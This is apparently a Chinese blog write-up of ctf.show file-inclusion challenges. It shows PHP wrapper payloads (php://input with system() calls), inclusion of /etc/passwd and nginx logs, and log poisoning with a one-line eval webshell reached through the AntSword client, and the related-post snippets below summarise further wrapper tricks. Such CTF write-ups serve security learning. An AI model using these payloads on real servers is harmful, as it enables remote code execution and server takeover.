php伪协议使用示例

最新推荐文章于 2023-11-13 14:56:22 发布
最新推荐文章于 2023-11-13 14:56:22 发布
阅读量413 收藏 4
点赞数
分类专栏: 问题及示例 安全 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoxiao_renhe/article/details/129889920
版权

1、进入ctf.show靶场的WEB分类下的web3、web4题

  打开的靶场内容显示如下图所示,是文件包含类型,需要上传一个文件,参数名称是 url

 

 2、打开靶场,使用kakit抓包后,利用php伪协议,上传一个php输入流

?url=php://input

<?php system('ls ./');?>

注意:此为执行“查看当前目录”命令。

 ?url=php://input

<?php system('cat ./ctf_go_go_go');?>

 注意:此为执行“查看当前目录下ctf_go_go_go文件内容”命令。

 如上图所示,获取本题flag。

3、利用php伪协议,上传一个服务本地文件

?url=/etc/passwd

注意:此为包含一个服务器本地/etc/passwd文件

 ?url=/var/log/nginx/access.log

注意:此为包含一个服务器本地/var/log/nginx/access.log文件

如上图所示,可以看到nginx的access.log中记录了浏览器版本信息,使用yakit抓包后,浏览器版本信息后面可以追加上一句话木马<?php @eval($_POST['test']);?>,然后放行后。

 使用“中国蚁剑”链接。注意这里的链接密码test是一句话目录需要传的参数名称(即需要执行的系统命令,将以该参数名提交到服务器)。

 如上图所示,点击“保存”后,双击该链接,可以直接链接到服务器,浏览服务器目录,发现当前页面的上级目录下有个flag.txt。

 双击flag.txt,即可查找到flag。

  另外网页上访问,可以发现flag。

 

XiaoXiao_RenHe
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议
等风来
05-22 9594
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
ctf之php伪协议使用
一只菜鸟呀的博客
05-20 1179
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。当它与包含函数结合时,php://filter流会被当作php文件执行。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。
PHP伪协议利用
Echo__h的博客
04-24 328
PHP内置的URL风格的封装协议 其中,常用的主要有:php://filter php://input phar://在文件包含php文件时会自动执行,而无法读出其源码,使用php://filter可以对文件内容进行读取 读取的内容为b64编码格式,解码后即为文件源码此方法需要allow_url_include = 0n.php://打开文件流后,我们可以直接发送post写入恶意代码,即可执行主要用于在PHP中对压缩文件的读取。多用于配合文件上传漏洞使用例如将shell.txt压缩成zip格式后上传到服务器
ctf中常用的PHP伪协议
weixin_35756637的博客
01-02 710
在CTF比赛中,常常会使用PHP伪协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP伪协议有几种常见的形式: data: 协议 这种形式的PHP伪协议通常用于在HTML中嵌入PHP代码,例如: <imgsrc="data:image/png;base64,PHP_CODE_HERE"> php: 协议 这种形式的PHP伪协议通常用于在浏览器中执行PHP代码,例如:...
PHP封装伪协议之zip流
m0_73720136的博客
05-08 755
通过本实验,利用PHP封装伪协议中的zip流,先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,绕过文件上传的限制,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传。使用zip协议需要指定绝对路径,使用相对路径会包含失败;同时将#编码为%23。
Web安全PHP伪协议漏洞利用,以及伪协议漏洞防护方法
Scalzdp的专栏
11-13 2065
单纯看伪协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用伪协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议使用示例、历史背景,以及如何在受限环境中安全使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
什么是php伪协议,并举例说明
02-25
PHP伪协议使用极大地扩展了PHP的功能,使得开发者能够更加灵活地处理各种数据。 首先,我们要理解PHP伪协议的基本概念。PHP内置了一些伪协议,如`file://`用于访问本地文件系统,`data://`用于传递Base64编码的...
2024年付费进群最新修复版
最新发布
06-20
2024年付费进群最新修复版 nginx1.2 php5.6--7.2均可最好是7.2 第一步:上传文件程序到网站根目录解压 第二步:导入数据库(shujuku.sql) 第三步:修改/config/database.php...功能使用说明,每个功能旁边都会有示例截图
IIS伪静态配置组件
10-22
2. 接受许可协议,按照向导指示进行安装。 3. 安装完成后,需要在IIS管理控制台中启用ISAPI筛选器,并添加ISAPI_Rewrite。 4. 创建httpd.ini或web.config文件,并编写URL重写规则。 5. 重启IIS服务,使更改生效。 *...
php教程目录.docx
03-01
探讨了HTML样式选择器、class样式选择器、ID样式选择器、关联样式选择器、组合样式选择器和伪元素样式选择器,通过实例来掌握它们的使用。 12. 常见的CSS属性和值 介绍了一些基本的CSS属性,如字体、文本、背景、...
PHP伪协议
qq_62604985的博客
07-10 1175
php伪协议,就是php支持的协议和封装协议file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流但是需要注意的是,当使用网络路径进行访问时,需要allow_url_fopen和allow_url_include都为ON。
php伪协议漏洞,php文件包含+伪协议+文件上传漏洞利用实例
weixin_42524883的博客
03-17 451
1.上传文件过滤了后缀名和MIME类型,$_FILES['pic']['type']是由浏览器传输的文件类型决定,但是mime_content_type()是由php内置方法判断文件类型;支持文件类型为application/zip,支持上传zip压缩文件,后缀名还是要改成.jpg或.gif,上传后将该名为随机数字(1499394959).jpg格式$name1=substr($name,-4);...
ctfshow-web3(伪协议php://input的利用)
Welcome To Myon'Blog !
10-07 1323
这是一个只读信息流,当请求方式是post的,并且enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据,当enctype等于”multipart/form-data”时php://input是无效的。利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码。,php执行时会将post内容当作文件内容,从而导致。存在文件包含时直接使用PHP伪协议。,当传入的参数作为文件名打开时,可以。
【网络安全 | CTF】攻防世界 fileclude 解题详析(php伪协议
等风来
07-31 4421
代码功能:检查通过GET请求传递的两个参数"file1"和"file2"。如果这两个参数都存在且非空,它将读取"file2"文件的内容,如果内容等于"hello ctf",则会执行"file1"文件。对于file1,我们可以使用 convert.base64-encode 过滤器来读取位于 flag.php 文件中的内容,并将其转换为 base64 编码的形式。php://input 是一个 PHP 的内置流(stream)封装器,用于从请求的正文(body)中获取原始的输入数据。
iwebsec靶场文件包含漏洞-file伪协议利用
qq_56041380的博客
04-06 213
file://伪协议可以访问本地文件系统,读取文件的内容。
PHP伪协议
errorr0
03-13 6577
php伪协议安全入门新手值得一看
php伪协议常用代码
08-05
常用的PHP伪协议代码包括: 1. 使用php://input执行PHP代码:这种方法可以通过将PHP代码作为POST数据传递,然后使用php://input伪协议来执行代码。例如,可以使用以下代码来执行phpinfo()函数并将结果输出到页面上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值